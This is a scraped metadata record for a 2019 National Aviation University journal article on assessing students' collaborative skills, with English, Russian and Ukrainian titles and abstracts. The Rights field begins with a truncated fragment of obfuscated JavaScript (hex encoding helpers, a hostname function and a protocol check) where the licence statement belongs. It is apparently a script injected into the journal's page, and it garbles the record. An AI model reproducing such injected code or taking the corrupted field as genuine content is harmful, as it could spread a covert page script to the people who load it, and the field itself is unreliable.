Запис Детальніше

ASSESSMENT OF COLLABORATIVE SKILLS

Наукові журнали НАУ

Переглянути архів Інформація
 
 
Поле Співвідношення
 
Title ASSESSMENT OF COLLABORATIVE SKILLS
Оценивание навыков совместной роботы у студентов
Оцінювання навичок співпраці студентів
 
Creator Piniuta, Irina; Baranovichi State University
 
Subject
collaboration; equality; participation; shareness; set of exercises; skills
37.035-057.87

совместная работа; равенство; участие; распределение; комплекс упражнений; умения
37.035-057.87

співпраця; рівність; участь; розподіл; комплекс вправ; вміння
37.035-057.87
 
Description The article deals with the assessment of the ways to develop collaborative skills. In the study, the students were suggested to do activities in teams using traditional practices and by means of Google Docs and Meeting Words web applications. Using the criteria of equality, participation and shareness the development of collaborative skills was assessed. The mixed research method which combined the survey of the students and the content analysis of students’ projects helped to reveal the effectiveness of using technology in the development of collaborative skills.
В статье рассматривается вопрос оценивания способов формирования навыков совместной работы у студентов. В исследовании студентам были предложены виды командной работы с использованием традиционных методов и Интернет приложений Google Docs and Meeting Words. Оценивание проводилось с использованием критериев равности, участия та распределения обязанностей. Комплекс исследовательских методов, который охватывает наблюдение за студентами и контент анализ студенческих проектов помог в выявлении эффективности использования данной методики в развитии умения совместной работы.
В статті розглядається питання оцінювання засобів розвитку навичок співпраці студентів. В дослідженні студентам запропоновані види командної діяльності з використанням традиційних методів навчання та Інтернет додатків Google Docs, Meeting Words. Оцінювання здійснювалось з використання критеріїв рівності, участі та розподілу відповідальності. Комплекс дослідницьких методів, що поєднав спостереження за студентами та контент аналіз студентських проектів допоміг у виявленні ефективності використання даної методики у розвитку вміння співпраці.
 
Publisher National Aviation University
 
Contributor


 
Date 2019-06-26
 
Type


 
Format application/pdf
application/pdf
application/pdf
 
Identifier http://jrnl.nau.edu.ua/index.php/visnik/article/view/13661
10.18372/2306-1472.1.13661
 
Source Proceedings of the National Aviation University; Том 78, № 1 (2019); 96-100
Вестник Национального авиационного университета; Том 78, № 1 (2019); 96-100
Вісник Національного Авіаційного Університету; Том 78, № 1 (2019); 96-100
 
Language en
 
Rights // o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "jrnl.nau.edu.ua"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e
Автори, які публікуються у цьому журналі, погоджуються з такими умовами:Автори залишають за собою право на авторство своєї роботи та передають журналу право першої публікації цієї роботи на умовах ліцензії Creative Commons Attribution License, котра дозволяє іншим особам вільно розповсюджувати опубліковану роботу з обов'язковим посиланням на авторів оригінальної роботи та першу публікацію роботи у цьому журналі.Автори мають право укладати самостійні додаткові угоди щодо неексклюзивного розповсюдження роботи у тому вигляді, в якому вона була опублікована цим журналом (наприклад, розміщувати роботу в електронному сховищі установи або публікувати у складі монографії), за умови збереження посилання на першу публікацію роботи у цьому журналі.Політика журналу дозволяє і заохочує розміщення авторами в мережі Інтернет (наприклад, у сховищах установ або на особистих веб-сайтах) рукопису роботи, як до подання цього рукопису до редакції, так і під час його редакційного опрацювання, оскільки це сприяє виникненню продуктивної наукової дискусії та позитивно позначається на оперативності та динаміці цитування опублікованої роботи (див. The Effect of Open Access).